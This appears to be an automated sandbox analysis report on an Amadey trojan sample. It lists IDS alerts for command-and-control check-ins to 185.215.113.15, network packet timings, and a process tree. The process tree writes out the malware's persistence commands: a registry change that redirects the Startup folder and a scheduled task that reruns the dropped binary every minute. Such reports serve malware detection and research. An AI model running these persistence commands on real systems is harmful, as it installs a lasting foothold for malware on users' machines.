    192.168.2.3185.215.113.1549784802027700 06/26/22-09:47:30.001407TCP2027700ET TROJAN Amadey CnC Check-In4978480192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549787802027700 06/26/22-09:47:30.877538TCP2027700ET TROJAN Amadey CnC Check-In4978780192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549793802027700 06/26/22-09:47:39.471421TCP2027700ET TROJAN Amadey CnC Check-In4979380192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549796802027700 06/26/22-09:47:40.783332TCP2027700ET TROJAN Amadey CnC Check-In4979680192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549799802027700 06/26/22-09:47:42.867694TCP2027700ET TROJAN Amadey CnC Check-In4979980192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549830802027700 06/26/22-09:48:30.483127TCP2027700ET TROJAN Amadey CnC Check-In4983080192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549818802027700 06/26/22-09:48:13.810900TCP2027700ET TROJAN Amadey CnC Check-In4981880192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549744802027700 06/26/22-09:46:53.237130TCP2027700ET TROJAN Amadey CnC Check-In4974480192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549815802027700 06/26/22-09:48:05.618223TCP2027700ET TROJAN Amadey CnC Check-In4981580192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549842802027700 06/26/22-09:48:44.262889TCP2027700ET TROJAN Amadey CnC Check-In4984280192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549791802027700 06/26/22-09:47:37.619364TCP2027700ET TROJAN Amadey CnC Check-In4979180192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549824802027700 06/26/22-09:48:18.293793TCP2027700ET TROJAN Amadey CnC Check-In4982480192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549833802027700 06/26/22-09:48:36.596810TCP2027700ET TROJAN Amadey CnC Check-In4983380192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549750802027700 06/26/22-09:47:03.761613TCP2027700ET TROJAN Amadey CnC Check-In4975080192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549809802027700 06/26/22-09:47:55.667044TCP2027700ET TROJAN Amadey CnC Check-In4980980192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549825802027700 06/26/22-09:48:19.702891TCP2027700ET TROJAN Amadey CnC Check-In4982580192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549788802027700 06/26/22-09:47:31.215612TCP2027700ET TROJAN Amadey CnC Check-In4978880192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549794802027700 06/26/22-09:47:42.618057TCP2027700ET TROJAN Amadey CnC Check-In4979480192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549753802027700 06/26/22-09:47:07.860735TCP2027700ET TROJAN Amadey CnC Check-In4975380192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549747802027700 06/26/22-09:46:59.493020TCP2027700ET TROJAN Amadey CnC Check-In4974780192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549813802027700 06/26/22-09:48:02.729973TCP2027700ET TROJAN Amadey CnC Check-In4981380192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549765802027700 06/26/22-09:47:21.494001TCP2027700ET TROJAN Amadey CnC Check-In4976580192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549742802027700 06/26/22-09:46:52.260106TCP2027700ET TROJAN Amadey CnC Check-In4974280192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549777802027700 06/26/22-09:47:26.632947TCP2027700ET TROJAN Amadey CnC Check-In4977780192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549783802027700 06/26/22-09:47:29.721183TCP2027700ET TROJAN Amadey CnC Check-In4978380192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549790802027700 06/26/22-09:47:31.866868TCP2027700ET TROJAN Amadey CnC Check-In4979080192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549802802027700 06/26/22-09:47:45.689140TCP2027700ET TROJAN Amadey CnC Check-In4980280192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549789802027700 06/26/22-09:47:31.596641TCP2027700ET TROJAN Amadey CnC Check-In4978980192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549754802027700 06/26/22-09:47:11.567118TCP2027700ET TROJAN Amadey CnC Check-In4975480192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549795802027700 06/26/22-09:47:39.970739TCP2027700ET TROJAN Amadey CnC Check-In4979580192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549820802027700 06/26/22-09:48:15.889921TCP2027700ET TROJAN Amadey CnC Check-In4982080192.168.2.3185.215.113.15
    TimestampSource PortDest PortSource IPDest IP
    Jun 26, 2022 09:46:52.202889919 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:52.204113007 CEST4974380192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:52.259402037 CEST8049742185.215.113.15192.168.2.3
    Jun 26, 2022 09:46:52.259541035 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:52.260106087 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:52.263921022 CEST8049743185.215.113.15192.168.2.3
    Jun 26, 2022 09:46:52.264056921 CEST4974380192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:52.264534950 CEST4974380192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:52.322077990 CEST8049742185.215.113.15192.168.2.3
    Jun 26, 2022 09:46:52.333787918 CEST8049743185.215.113.15192.168.2.3
    Jun 26, 2022 09:46:53.021445990 CEST8049742185.215.113.15192.168.2.3
    Jun 26, 2022 09:46:53.021548033 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.022270918 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.022458076 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.022586107 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.022691011 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.022790909 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.022902966 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.023004055 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.023108959 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.023211002 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.023314953 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.023422003 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.023520947 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.023627043 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.023758888 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.023874044 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.023931026 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.024036884 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.024138927 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.024267912 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.024373055 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.024490118 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.024573088 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.024672985 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.024806976 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.024982929 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.025115013 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.025243044 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.025348902 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.025456905 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.025561094 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.025659084 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.025764942 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.025861025 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.025962114 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.026062012 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.026165962 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.026271105 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.026367903 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.026465893 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.026567936 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.026669025 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.026767969 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.026873112 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.026971102 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.027086973 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.027179003 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.027282000 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.027385950 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.027482986 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.027589083 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.027690887 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.027793884 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.027894974 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.027997017 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.028109074 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.028213024 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.028321981 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.028424978 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.028526068 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.028631926 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.028734922 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.028840065 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.028939962 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.029043913 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.029146910 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.029251099 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.029352903 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.029460907 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.029566050 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.029668093 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.029772043 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.029877901 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.029978037 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.030086040 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.030190945 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.030294895 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.030400038 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.030508041 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.030616045 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.030718088 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.030821085 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.030942917 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.031053066 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.031188011 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.031297922 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.031431913 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.031591892 CEST4974280192.168.2.3185.215.113.15
    Jun 26, 2022 09:46:53.031721115 CEST4974280192.168.2.3185.215.113.15
    • 185.215.113.15

    Click to jump to process

    Target ID:0
    Start time:09:46:40
    Start date:26/06/2022
    Path:C:\Users\user\Desktop\yIF7nMz573.exe
    Wow64 process (32bit):true
    Commandline:"C:\Users\user\Desktop\yIF7nMz573.exe"
    Imagebase:0x400000
    File size:366080 bytes
    MD5 hash:DCE2A8F4AB60879898A21AB451CAD63F
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:low

    Target ID:1
    Start time:09:46:46
    Start date:26/06/2022
    Path:C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe
    Wow64 process (32bit):true
    Commandline:"C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe"
    Imagebase:0x400000
    File size:366080 bytes
    MD5 hash:DCE2A8F4AB60879898A21AB451CAD63F
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Antivirus matches:
    • Detection: 100%, Joe Sandbox ML
    • Detection: 46%, ReversingLabs
    Reputation:low

    Target ID:4
    Start time:09:46:50
    Start date:26/06/2022
    Path:C:\Windows\SysWOW64\cmd.exe
    Wow64 process (32bit):true
    Commandline:"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\62eca45584\
    Imagebase:0xc20000
    File size:232960 bytes
    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Target ID:5
    Start time:09:46:51
    Start date:26/06/2022
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff7c9170000
    File size:625664 bytes
    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Target ID:6
    Start time:09:46:51
    Start date:26/06/2022
    Path:C:\Windows\SysWOW64\schtasks.exe
    Wow64 process (32bit):true
    Commandline:"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN bguuwe.exe /TR "C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe" /F
    Imagebase:0x13c0000
    File size:185856 bytes
    MD5 hash:15FF7D8324231381BAD48A052F85DF04
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Target ID:7
    Start time:09:46:51
    Start date:26/06/2022
    Path:C:\Windows\SysWOW64\reg.exe
    Wow64 process (32bit):true
    Commandline:REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\62eca45584\
    Imagebase:0x330000
    File size:59392 bytes
    MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Target ID:8
    Start time:09:46:51
    Start date:26/06/2022
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff7c9170000
    File size:625664 bytes
    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Target ID:10
    Start time:09:46:53
    Start date:26/06/2022
    Path:C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe
    Wow64 process (32bit):true
    Commandline:C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe
    Imagebase:0x400000
    File size:366080 bytes
    MD5 hash:DCE2A8F4AB60879898A21AB451CAD63F
    Has elevated privileges:false
    Has administrator privileges:false
    Programmed in:C, C++ or other language
    Reputation:low

    Target ID:19
    Start time:09:48:00
    Start date:26/06/2022
    Path:C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe
    Wow64 process (32bit):true
    Commandline:C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe
    Imagebase:0x400000
    File size:366080 bytes
    MD5 hash:DCE2A8F4AB60879898A21AB451CAD63F
    Has elevated privileges:false
    Has administrator privileges:false
    Programmed in:C, C++ or other language
    Reputation:low

    No disassembly